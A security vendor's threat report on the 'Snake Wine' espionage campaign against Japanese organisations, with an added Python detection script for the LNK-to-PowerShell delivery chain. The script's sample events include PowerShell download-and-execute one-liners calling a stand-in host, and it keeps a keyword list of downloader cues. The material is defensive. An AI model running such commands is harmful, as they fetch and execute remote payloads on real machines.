While APTs targeting certain regions are nothing new, Cylance has discovered another prolonged campaign, beginning around August 2016, that appears to exclusively target Japanese companies and individuals. The Deception Project is a Japanese-centric threat that installs malware and backdoors to conduct APT campaigns. These secretly embed themselves in organizations for long periods of time, allowing the attackers to conduct espionage and potentially steal confidential or proprietary information.
The group has been dubbed “Snake Wine” by Cylance’s research team. Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger disinformation campaign to fake the attribution of this threat.
In an effort to expose a common problem we see happening in the industry, Cylance wanted to shed light on just how easy it is to fake attribution. The key factor we should be focused on, as an industry, is determining HOW an attacker can take down an organization, rather than focusing only on the WHO. Once we can identify how the attack happened, we can focus on what’s really important – prevention.
To date, all observed attacks by Snake Wine were the result of spear phishing attempts against the victim organizations. The latest batch used well-crafted LNK files contained within similarly named password-protected ZIP files. When opened, the LNK files execute a PowerShell command via ‘cmd.exe /c’ to download and execute an additional payload.
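The delivery chain above (an LNK file that runs ‘cmd.exe /c’, which in turn starts a PowerShell download-and-execute command) leaves a recognizable parent/child pattern in process-creation telemetry. The following detection logic is an added example, not code from the original report: it assumes events exported as `parent image|child image|child command line` rows, and the sample rows are constructed.

```python
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str  # command line of the created process

# cmd.exe /c handing off to powershell: the launch chain the LNK files produce.
CMD_C_POWERSHELL = re.compile(r"/c\b.*\bpowershell\b", re.IGNORECASE)
# Download-and-execute cues in a PowerShell command line.
DOWNLOAD_EXEC = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIEX\b|"
    r"Invoke-Expression|Start-Process|FromBase64String|-enc(odedcommand)?\b",
    re.IGNORECASE)

def _name(path):
    return ntpath.basename(path).lower()

def classify(ev):
    """Severity for one event ('high', 'medium', 'low') or None when nothing matches."""
    chain = (_name(ev.image) == "powershell.exe" and _name(ev.parent) == "cmd.exe") or (
        _name(ev.image) == "cmd.exe" and CMD_C_POWERSHELL.search(ev.cmdline) is not None)
    downloader = DOWNLOAD_EXEC.search(ev.cmdline) is not None
    if chain and downloader:
        return "high"    # cmd /c -> PowerShell downloader, the pattern of the LNK lure
    if chain:
        return "medium"  # cmd /c -> PowerShell without download cues
    if downloader:
        return "low"     # PowerShell downloader started by some other parent
    return None

def scan(text):
    """Parse 'parent|image|command line' rows and classify each one."""
    rows = [line.split("|", 2) for line in text.strip().splitlines()]
    return [classify(ProcEvent(*row)) for row in rows]

# Constructed sample process-creation events (not taken from the report).
SAMPLE_EVENTS = r"""
C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\Users
C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File C:\scripts\backup.ps1
C:\Program Files\Corp\agent.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x','C:\t\x.exe'); Start-Process C:\t\x.exe"
"""

if __name__ == "__main__":
    for sev, line in zip(scan(SAMPLE_EVENTS), SAMPLE_EVENTS.strip().splitlines()):
        print(sev, "|", line.split("|", 2)[2])
```

The two ‘cmd.exe /c’ to PowerShell downloader rows score high, the scheduled-looking `-File` run only medium, and the downloader started by a non-cmd parent low, so the rule isolates the page's chain rather than all PowerShell use.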
The additional payload includes a decoy document that executes shellcode nearly identical to what Cylance calls ‘The Ham Backdoor.’ The Ham Backdoor functions primarily as a modular platform, giving the attacker the ability to download additional modules directly from the command and control (C2) server and execute them in memory.
If you use our endpoint protection product, CylancePROTECT, you were already protected from this attack. The Script Control feature of CylancePROTECT will prevent the initial PowerShell script from running and stop any further compromise or the download of malware.
If this feature is disabled or in alert mode, then after the payload is downloaded and attempts to execute, the local artificial intelligence model on the endpoint will prevent the execution of any file, thus impeding the Ham Backdoor threat or any other components from executing.
The Snake Wine group has proven to be highly adaptable and continues to adopt new tactics in order to establish footholds inside of victim environments. The exclusive interest in Japanese government, education, and commerce will continue into the future, as the group is just starting to build and utilize its current attack infrastructure. If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released information.
If you don't have CylancePROTECT, contact us to learn how our AI-based solution can predict and prevent unknown and emerging threats.